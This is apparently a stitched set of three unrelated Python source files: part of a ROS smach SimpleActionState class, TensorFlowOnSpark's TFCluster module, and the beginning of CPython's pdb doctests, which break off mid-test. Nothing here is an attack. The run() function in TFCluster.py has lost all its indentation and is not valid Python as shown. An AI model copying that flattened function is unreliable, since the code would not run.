        - userdata
        - current stored goal
        The callback returns a goal message.
        @type feedback_cb: callable
        @param feedback_cb: This callback will be called with the feedback
        from the action server. The callback is passed two parameters:
        - userdata (L{UserData<smach.user_data.UserData>})
        - feedback (actionlib feedback msg)
        @type result_key: string
        @param result_key: Put the result message into the userdata with
        the given key. This will be done after calling the result_cb
        if result_cb is defined.
        @type result_slots: list of strings
        @param result_slots: Put the result message fields (__slots__)
        into the userdata with keys like the field names. This will be done
        after calling the result_cb if result_cb is defined.
        @type result_cb: callable
        @param result_cb: If result information from this action needs to be
        stored or manipulated on reception of a result from this action, a
        callback can be stored which is passed this information. The callback
        is passed three parameters:
        - userdata (L{UserData<smach.user_data.UserData>})
        - result status (C{actionlib.GoalStatus})
        - result (actionlib result msg)
        @type exec_timeout: C{rospy.Duration}
        @param exec_timeout: This is the timeout used for sending a preempt message
        to the delegate action. This is C{None} by default, which implies no
        timeout.
        @type preempt_timeout: C{rospy.Duration}
        @param preempt_timeout: This is the timeout used for aborting after a
        preempt has been sent to the action and no result has been received. This
        timeout begins counting after a preempt message has been sent.
        @type server_wait_timeout: C{rospy.Duration}
        @param server_wait_timeout: This is the timeout used for aborting while
        waiting for an action server to become active.
        """
        # Initialize base class
        State.__init__(self, outcomes=['succeeded','aborted','preempted'])
        # Set action properties
        self._action_name = action_name
        self._action_spec = action_spec
        # Goal-result bookkeeping and timeouts
        self._goal_status = 0
        self._goal_result = None
        self._exec_timeout = exec_timeout
        self._preempt_timeout = preempt_timeout
        self._server_wait_timeout = server_wait_timeout
        # Set goal generation policy
        if goal and hasattr(goal, '__call__'):
            raise smach.InvalidStateError("Goal object given to SimpleActionState that IS a function object")
        sl = action_spec().action_goal.goal.__slots__
        if not all([s in sl for s in goal_slots]):
            raise smach.InvalidStateError("Goal slots specified are not valid slots. Available slots: %s; specified slots: %s" % (sl, goal_slots))
        if goal_cb and not hasattr(goal_cb, '__call__'):
            raise smach.InvalidStateError("Goal callback object given to SimpleActionState that IS NOT a function object")
        # Static goal
        if goal is None:
            self._goal = copy.copy(action_spec().action_goal.goal)
        else:
            self._goal = goal
        # Goal from userdata key
        self._goal_key = goal_key
        if goal_key is not None:
            self.register_input_keys([goal_key])
        # Goal slots from userdata keys
        self._goal_slots = goal_slots
        self.register_input_keys(goal_slots)
        # Goal generation callback
        self._goal_cb = goal_cb
        self._goal_cb_args = goal_cb_args
        self._goal_cb_kwargs = goal_cb_kwargs
        if smach.has_smach_interface(goal_cb):
            # Callback declares its own keys; adopt and register them.
            self._goal_cb_input_keys = goal_cb.get_registered_input_keys()
            self._goal_cb_output_keys = goal_cb.get_registered_output_keys()
            self.register_input_keys(self._goal_cb_input_keys)
            self.register_output_keys(self._goal_cb_output_keys)
        else:
            self._goal_cb_input_keys = input_keys
            self._goal_cb_output_keys = output_keys
        # Feedback callback
        if feedback_cb and not hasattr(feedback_cb, '__call__'):
            raise smach.InvalidStateError("Feedback callback object given to SimpleActionState that IS NOT a function object")
        self._feedback_cb = feedback_cb
        self._feedback_cb_args = feedback_cb_args
        self._feedback_cb_kwargs = feedback_cb_kwargs
        if smach.has_smach_interface(feedback_cb):
            self._feedback_cb_input_keys = feedback_cb.get_registered_input_keys()
            self._feedback_cb_output_keys = feedback_cb.get_registered_output_keys()
            self.register_input_keys(self._feedback_cb_input_keys)
            self.register_output_keys(self._feedback_cb_output_keys)
        else:
            self._feedback_cb_input_keys = input_keys
            self._feedback_cb_output_keys = output_keys
        # Set result processing policy
        if result_cb and not hasattr(result_cb, '__call__'):
            raise smach.InvalidStateError("Result callback object given to SimpleActionState that IS NOT a function object")
        if not all([s in action_spec().action_result.result.__slots__ for s in result_slots]):
            raise smach.InvalidStateError("Result slots specified are not valid slots.")
        # Result callback
        self._result_cb = result_cb
        self._result_cb_args = result_cb_args
        self._result_cb_kwargs = result_cb_kwargs
        if smach.has_smach_interface(result_cb):
            self._result_cb_input_keys = result_cb.get_registered_input_keys()
            self._result_cb_output_keys = result_cb.get_registered_output_keys()
            self._result_cb_outcomes = result_cb.get_registered_outcomes()
            self.register_input_keys(self._result_cb_input_keys)
            self.register_output_keys(self._result_cb_output_keys)
            self.register_outcomes(self._result_cb_outcomes)
        else:
            self._result_cb_input_keys = input_keys
            self._result_cb_output_keys = output_keys
            self._result_cb_outcomes = outcomes
        # Result to userdata key
        self._result_key = result_key
        if result_key is not None:
            self.register_output_keys([result_key])
        # Result slots to userdata keys
        self._result_slots = result_slots
        self.register_output_keys(result_slots)
        # Register additional input and output keys
        self.register_input_keys(input_keys)
        self.register_output_keys(output_keys)
        self.register_outcomes(outcomes)
        # Declare some status variables
        self._activate_time = rospy.Time.now()
        self._preempt_time = rospy.Time.now()
        self._duration = rospy.Duration(0.0)
        self._status = SimpleActionState.WAITING_FOR_SERVER
        # Construct action client, and wait for it to come active
        # (waiting happens on a background thread so constructing this
        # state does not block construction of other states).
        self._action_client = SimpleActionClient(action_name, action_spec)
        self._action_wait_thread = threading.Thread(name=self._action_name+'/wait_for_server', target=self._wait_for_server)
        self._action_wait_thread.start()
        self._execution_timer_thread = None
        # Condition variables for threading synchronization
        self._done_cond = threading.Condition()
    def _wait_for_server(self):
        """Internal method for waiting for the action server
        This is run in a separate thread and allows construction of this state
        to not block the construction of other states.
        """
        timeout_time = rospy.get_rostime() + self._server_wait_timeout
        # Poll in 1-second slices so shutdown/preempt are noticed promptly.
        while self._status == SimpleActionState.WAITING_FOR_SERVER and not rospy.is_shutdown() and not rospy.get_rostime() >= timeout_time:
            try:
                if self._action_client.wait_for_server(rospy.Duration(1.0)):#self._server_wait_timeout):
                    self._status = SimpleActionState.INACTIVE
                if self.preempt_requested():
                    return
            except:
                if not rospy.core._in_shutdown: # This is a hack, wait_for_server should not throw an exception just because shutdown was called
                    rospy.logerr("Failed to wait for action server '%s'" % (self._action_name))
    def _execution_timer(self):
        """Internal method for cancelling a timed out goal after a timeout."""
        while self._status == SimpleActionState.ACTIVE and not rospy.is_shutdown():
            try:
                rospy.sleep(0.1)
            except:
                if not rospy.is_shutdown():
                    rospy.logerr("Failed to sleep while running '%s'" % self._action_name)
            if rospy.Time.now() - self._activate_time > self._exec_timeout:
                rospy.logwarn("Action %s timed out after %d seconds." % (self._action_name, self._exec_timeout.to_sec()))
                # Cancel the goal
                self._action_client.cancel_goal()
    ### smach State API
    def request_preempt(self):
        rospy.loginfo("Preempt requested on action '%s'" % (self._action_name))
        smach.State.request_preempt(self)
        if self._status == SimpleActionState.ACTIVE:
            rospy.loginfo("Preempt on action '%s' cancelling goal: \n%s" % (self._action_name, str(self._goal)))
            # Cancel the goal
            self._action_client.cancel_goal()
    def execute(self, ud):
        """Called when executing a state.
        This calls the goal_cb if it is defined, and then dispatches the
        goal with a non-blocking call to the action client.
        """
        # Make sure we're connected to the action server
        if self._status is SimpleActionState.WAITING_FOR_SERVER:
            rospy.logwarn("Still waiting for action server '%s' to start... is it running?" % self._action_name)
            if self._action_wait_thread.is_alive():
                # Block on joining the server wait thread (This can be preempted)
                self._action_wait_thread.join()
            else:
                # Wait for the server in this thread (This can also be preempted)
                self._wait_for_server()
            if not self.preempt_requested():
                # In case of preemption we probably didn't connect
                rospy.loginfo("Connected to action server '%s'." % self._action_name)
        # Check for preemption before executing
        if self.preempt_requested():
            rospy.loginfo("Preempting %s before sending goal." % self._action_name)
            self.service_preempt()
            return 'preempted'
        # We should only get here if we have connected to the server
        if self._status is SimpleActionState.WAITING_FOR_SERVER:
            rospy.logfatal("Action server for "+self._action_name+" is not running.")
            return 'aborted'
        else:
            self._status = SimpleActionState.INACTIVE
        # Grab goal key, if set
        if self._goal_key is not None:
            self._goal = ud[self._goal_key]
        # Write goal fields from userdata if set
        for key in self._goal_slots:
            setattr(self._goal, key, ud[key])
        # Call user-supplied callback, if set, to get a goal
        if self._goal_cb is not None:
            try:
                goal_update = self._goal_cb(
                        smach.Remapper(
                            ud,
                            self._goal_cb_input_keys,
                            self._goal_cb_output_keys,
                            []),
                        self._goal,
                        *self._goal_cb_args,
                        **self._goal_cb_kwargs)
                if goal_update is not None:
                    self._goal = goal_update
            except:
                rospy.logerr("Could not execute goal callback: "+traceback.format_exc())
                return 'aborted'
        # Make sure the necessary paramters have been set
        if self._goal is None and self._goal_cb is None:
            rospy.logerr("Attempting to activate action "+self._action_name+" with no goal or goal callback set. Did you construct the SimpleActionState properly?")
            return 'aborted'
        # Dispatch goal via non-blocking call to action client
        self._activate_time = rospy.Time.now()
        self._status = SimpleActionState.ACTIVE
        # Wait on done condition
        self._done_cond.acquire()
        # Stash userdata so the feedback callback (which runs on the action
        # client's thread) can remap it.
        self._ud = ud
        self._action_client.send_goal(self._goal, self._goal_done_cb, self._goal_active_cb, self._goal_feedback_cb)
        # Preempt timeout watch thread
        if self._exec_timeout:
            self._execution_timer_thread = threading.Thread(name=self._action_name+'/preempt_watchdog', target=self._execution_timer)
            self._execution_timer_thread.start()
        # Wait for action to finish
        self._done_cond.wait()
        # Call user result callback if defined
        result_cb_outcome = None
        if self._result_cb is not None:
            try:
                result_cb_outcome = self._result_cb(
                        smach.Remapper(
                            ud,
                            self._result_cb_input_keys,
                            self._result_cb_output_keys,
                            []),
                        self._goal_status,
                        self._goal_result)
                if result_cb_outcome is not None and result_cb_outcome not in self.get_registered_outcomes():
                    rospy.logerr("Result callback for action "+self._action_name+", "+str(self._result_cb)+" was not registered with the result_cb_outcomes argument. The result callback returned '"+str(result_cb_outcome)+"' but the only registered outcomes are: "+str(self.get_registered_outcomes()))
                    return 'aborted'
            except:
                rospy.logerr("Could not execute result callback: "+traceback.format_exc())
                return 'aborted'
        if self._result_key is not None:
            ud[self._result_key] = self._goal_result
        for key in self._result_slots:
            ud[key] = getattr(self._goal_result, key)
        # Check status
        if self._status == SimpleActionState.INACTIVE:
            # Set the outcome on the result state
            if self._goal_status == GoalStatus.SUCCEEDED:
                outcome = 'succeeded'
            elif self._goal_status == GoalStatus.PREEMPTED and self.preempt_requested():
                outcome = 'preempted'
                self.service_preempt()
            else:
                # All failures at this level are captured by aborting, even if we timed out
                # This is an important distinction between local preemption, and preemption
                # from above.
                outcome = 'aborted'
        else:
            # We terminated without going inactive
            rospy.logwarn("Action state terminated without going inactive first.")
            outcome = 'aborted'
        # Check custom result cb outcome
        if result_cb_outcome is not None:
            outcome = result_cb_outcome
        # Set status inactive
        self._status = SimpleActionState.INACTIVE
        self._done_cond.release()
        return outcome
    ### Action client callbacks
    def _goal_active_cb(self):
        """Goal Active Callback
        This callback starts the timer that watches for the timeout specified for this action.
        """
        rospy.logdebug("Action "+self._action_name+" has gone active.")
    def _goal_feedback_cb(self, feedback):
        """Goal Feedback Callback"""
        rospy.logdebug("Action "+self._action_name+" sent feedback.")
        if self._feedback_cb is not None:
            self._feedback_cb(
                    smach.Remapper(
                        self._ud,
                        self._feedback_cb_input_keys,
                        self._feedback_cb_output_keys,
                        []),
                    feedback,
                    *self._feedback_cb_args,
                    **self._feedback_cb_kwargs)
    def _goal_done_cb(self, result_state, result):
        """Goal Done Callback
        This callback resets the active flags and reports the duration of the action.
        Also, if the user has defined a result_cb, it is called here before the
        method returns.
        """
        def get_result_str(i):
            strs = ('PENDING','ACTIVE','PREEMPTED','SUCCEEDED','ABORTED','REJECTED','LOST')
            if i < len(strs):
                return strs[i]
            else:
                return 'UNKNOWN ('+str(i)+')'
        # Calculate duration
        self._duration = rospy.Time.now() - self._activate_time
        rospy.logdebug("Action "+self._action_name+" terminated after "\
                +str(self._duration.to_sec())+" seconds with result "\
                +get_result_str(self._action_client.get_state())+".")
        # Store goal state
        self._goal_status = result_state
        self._goal_result = result
        # Reset status
        self._status = SimpleActionState.INACTIVE
        # Notify done
        self._done_cond.acquire()
        self._done_cond.notify()
        self._done_cond.release()
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# Status of the TF background job. Shared mutable dict: the background
# thread in run() records an 'error' entry here on failure so the driver
# (and TFCluster.shutdown) can detect that the TensorFlow job failed.
tf_status = {}
class InputMode(object):
    """Enum for the input modes of data feeding."""
    TENSORFLOW = 0  #: TensorFlow application is responsible for reading any data.
    SPARK = 1  #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
    """Handle to a running TensorFlowOnSpark cluster.

    Instances are created by the module-level run() function; the methods
    here feed data (InputMode.SPARK) and shut the cluster down.
    """
    sc = None                   #: SparkContext
    defaultFS = None            #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
    working_dir = None          #: Current working directory
    num_executors = None        #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
    nodeRDD = None              #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
    cluster_id = None           #: Unique ID for this cluster, used to invalidate state for new clusters.
    cluster_info = None         #: Cluster node reservations
    cluster_meta = None         #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
    input_mode = None           #: TFCluster.InputMode for this cluster
    queues = None               #: *INTERNAL_USE*
    server = None               #: reservation.Server for this cluster
    def train(self, dataRDD, num_epochs=0, qname='input'):
        """*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
        It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
        Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
        to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
        for more details.
        Args:
          :dataRDD: input data as a Spark RDD.
          :num_epochs: number of times to repeat the dataset during training.
          :qname: *INTERNAL USE*.
        """
        logging.info("Feeding training data")
        assert(self.input_mode == InputMode.SPARK)
        assert(qname in self.queues)
        assert(num_epochs >= 0)
        if isinstance(dataRDD, DStream):
            # Spark Streaming: feed each micro-batch RDD as it arrives.
            dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
        else:
            # Spark RDD
            # if num_epochs unspecified, pick an arbitrarily "large" number for now
            # TODO: calculate via dataRDD.count() / batch_size / max_steps
            if num_epochs == 0:
                num_epochs = 10
            # Epochs are implemented by unioning the RDD with itself.
            rdds = [dataRDD] * num_epochs
            unionRDD = self.sc.union(rdds)
            unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
    def inference(self, dataRDD, qname='input'):
        """*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
        It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
        This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
        Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
        Args:
          :dataRDD: input data as a Spark RDD
          :qname: *INTERNAL_USE*
        Returns:
          A Spark RDD representing the output of the TensorFlow inferencing
        """
        logging.info("Feeding inference data")
        assert(self.input_mode == InputMode.SPARK)
        assert(qname in self.queues)
        return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
    def shutdown(self, ssc=None):
        """Stops the distributed TensorFlow cluster.
        Args:
          :ssc: *For Streaming applications only*. Spark StreamingContext
        """
        logging.info("Stopping TensorFlow nodes")
        # identify ps/workers
        ps_list, worker_list = [], []
        for node in self.cluster_info:
            (ps_list if node['job_name'] == 'ps' else worker_list).append(node)
        if ssc is not None:
            # Spark Streaming: poll until the reservation server reports done.
            while not ssc.awaitTerminationOrTimeout(1):
                if self.server.done:
                    logging.info("Server done, stopping StreamingContext")
                    ssc.stop(stopSparkContext=False, stopGraceFully=True)
                    break
        elif self.input_mode == InputMode.TENSORFLOW:
            # in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
            # to complete all tasks, while accounting for any PS tasks which run indefinitely.
            count = 0
            while count < 3:
                st = self.sc.statusTracker()
                jobs = st.getActiveJobsIds()
                if len(jobs) == 0:
                    break
                stages = st.getActiveStageIds()
                for i in stages:
                    si = st.getStageInfo(i)
                    if si.numActiveTasks == len(ps_list):
                        # if we only have PS tasks left, check that we see this condition a couple times
                        count += 1
                time.sleep(5)
        # shutdown queues and managers for "worker" executors.
        # note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
        # in TENSORFLOW mode, this will only run after all workers have finished.
        workers = len(worker_list)
        workerRDD = self.sc.parallelize(range(workers), workers)
        workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
        # exit Spark application w/ err status if TF job had any errors
        if 'error' in tf_status:
            logging.error("Exiting Spark application with error status.")
            self.sc.cancelAllJobs()
            self.sc.stop()
            sys.exit(1)
        logging.info("Shutting down cluster")
        # shutdown queues and managers for "PS" executors.
        # note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
        for node in ps_list:
            addr = node['addr']
            authkey = node['authkey']
            m = TFManager.connect(addr, authkey)
            q = m.get_queue('control')
            # None is the sentinel telling the PS node to stop.
            q.put(None)
            q.join()
        # wait for all jobs to finish
        while True:
            time.sleep(5)
            st = self.sc.statusTracker()
            jobs = st.getActiveJobsIds()
            if len(jobs) == 0:
                break
    def tensorboard_url(self):
        """Utility function to get the Tensorboard URL"""
        # The node that spawned TensorBoard advertises a non-zero tb_port.
        for node in self.cluster_info:
            if node['tb_port'] != 0:
                return "http://{0}:{1}".format(node['host'], node['tb_port'])
        return None
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert(num_ps < num_executors)
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
test_pdb.py | # A test suite for pdb; not very comprehensive at the moment.
import doctest
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
class PdbTestInput(object):
    """Context manager that makes testing Pdb in doctests easier."""

    def __init__(self, input):
        # `input` is the list of canned pdb command strings to feed via stdin.
        self.input = input

    def __enter__(self):
        self.real_stdin = sys.stdin
        sys.stdin = _FakeInput(self.input)
        # Remember any pre-existing trace function so it can be restored on exit.
        self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None

    def __exit__(self, *exc):
        sys.stdin = self.real_stdin
        if self.orig_trace:
            sys.settrace(self.orig_trace)
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_displayhook():
    """This tests the custom displayhook for pdb.

    >>> def test_function(foo, bar):
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     pass

    >>> with PdbTestInput([
    ...     'foo',
    ...     'bar',
    ...     'for i in range(5): print(i)',
    ...     'continue',
    ... ]):
    ...     test_function(1, None)
    > <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
    -> pass
    (Pdb) foo
    1
    (Pdb) bar
    (Pdb) for i in range(5): print(i)
    0
    1
    2
    3
    4
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); line numbers in the
# expected output depend on the exact line layout of the examples.
def test_pdb_basic_commands():
    """Test the basic commands of pdb.

    >>> def test_function_2(foo, bar='default'):
    ...     print(foo)
    ...     for i in range(5):
    ...         print(i)
    ...     print(bar)
    ...     for i in range(10):
    ...         never_executed
    ...     print('after for')
    ...     print('...')
    ...     return foo.upper()

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     ret = test_function_2('baz')
    ...     print(ret)

    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'step',       # entering the function call
    ...     'args',       # display function args
    ...     'list',       # list function source
    ...     'bt',         # display backtrace
    ...     'up',         # step up to test_function()
    ...     'down',       # step down to test_function_2() again
    ...     'next',       # stepping to print(foo)
    ...     'next',       # stepping to the for loop
    ...     'step',       # stepping into the for loop
    ...     'until',      # continuing until out of the for loop
    ...     'next',       # executing the print(bar)
    ...     'jump 8',     # jump over second for loop
    ...     'return',     # return out of function
    ...     'retval',     # display return value
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) args
    foo = 'baz'
    bar = 'default'
    (Pdb) list
      1  ->     def test_function_2(foo, bar='default'):
      2             print(foo)
      3             for i in range(5):
      4                 print(i)
      5             print(bar)
      6             for i in range(10):
      7                 never_executed
      8             print('after for')
      9             print('...')
     10             return foo.upper()
    [EOF]
    (Pdb) bt
    ...
      <doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
    -> test_function()
      <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
    -> ret = test_function_2('baz')
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) up
    > <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) down
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
    -> print(foo)
    (Pdb) next
    baz
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
    -> for i in range(5):
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
    -> print(i)
    (Pdb) until
    0
    1
    2
    3
    4
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
    -> print(bar)
    (Pdb) next
    default
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
    -> for i in range(10):
    (Pdb) jump 8
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
    -> print('after for')
    (Pdb) return
    after for
    ...
    --Return--
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
    -> return foo.upper()
    (Pdb) retval
    'BAZ'
    (Pdb) continue
    BAZ
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_breakpoint_commands():
    """Test basic commands related to breakpoints.

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     print(1)
    ...     print(2)
    ...     print(3)
    ...     print(4)

    First, need to clear bdb state that might be left over from previous tests.
    Otherwise, the new breakpoints might get assigned different numbers.

    >>> from bdb import Breakpoint
    >>> Breakpoint.next = 1
    >>> Breakpoint.bplist = {}
    >>> Breakpoint.bpbynumber = [None]

    Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
    the breakpoint list outputs a tab for the "stop only" and "ignore next"
    lines, which we don't want to put in here.

    >>> with PdbTestInput([  # doctest: +NORMALIZE_WHITESPACE
    ...     'break 3',
    ...     'disable 1',
    ...     'ignore 1 10',
    ...     'condition 1 1 < 2',
    ...     'break 4',
    ...     'break 4',
    ...     'break',
    ...     'clear 3',
    ...     'break',
    ...     'condition 1',
    ...     'enable 1',
    ...     'clear 1',
    ...     'commands 2',
    ...     'p "42"',
    ...     'print("42", 7*6)',     # Issue 18764 (not about breakpoints)
    ...     'end',
    ...     'continue',  # will stop at breakpoint 2 (line 4)
    ...     'clear',  # clear all!
    ...     'y',
    ...     'tbreak 5',
    ...     'continue',  # will stop at temporary breakpoint
    ...     'break',  # make sure breakpoint is gone
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
    -> print(1)
    (Pdb) break 3
    Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) disable 1
    Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) ignore 1 10
    Will ignore next 10 crossings of breakpoint 1.
    (Pdb) condition 1 1 < 2
    New condition set for breakpoint 1.
    (Pdb) break 4
    Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break 4
    Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break
    Num Type         Disp Enb   Where
    1   breakpoint   keep no    at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
            stop only if 1 < 2
            ignore next 10 hits
